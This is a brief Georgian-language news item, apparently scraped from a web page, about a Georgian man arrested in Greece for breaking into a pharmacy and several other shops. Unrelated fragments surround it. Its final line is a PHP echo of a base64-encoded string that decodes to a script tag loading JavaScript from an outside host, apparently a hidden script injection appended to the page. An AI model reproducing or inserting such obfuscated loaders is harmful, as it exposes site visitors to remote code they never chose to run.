celsiusi
ავერსი შნაიდერი

საბერძნეთში 34 წლის ქართველი დააკავეს - ბერძნული მედიის ცნობით, კაცი აფთიაქში შეიჭრა და თანხა მოიპარა. 

გამოცემის ინფორმაციით, ადგილზე საპატრულო პოლიციის ეკიპაჟი პატრულირებდა. ეკიპაჟმა კაცი გუშინ დილით ამპელოკიფში ფაქტზე დააკავა.

პოლიციის დაცვის დეპარტამენტმა განცხადება გაავრცელა და აღნიშნა, რომ 2021 წლის დეკემბრიდან დაკავებულმა იმავე ტერიტორიაზე დამატებით სამ დაწესებულებაში: საეკლესიო ნივთების მაღაზია, აფთიაქი და საკონდიტრო, შეიჭრა. ბერძნული პოლიციის ინფორმაციით, ქართველი კაცი ფულსა და სხვადასხვა პროდუქტს იპარავდა. 

531
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");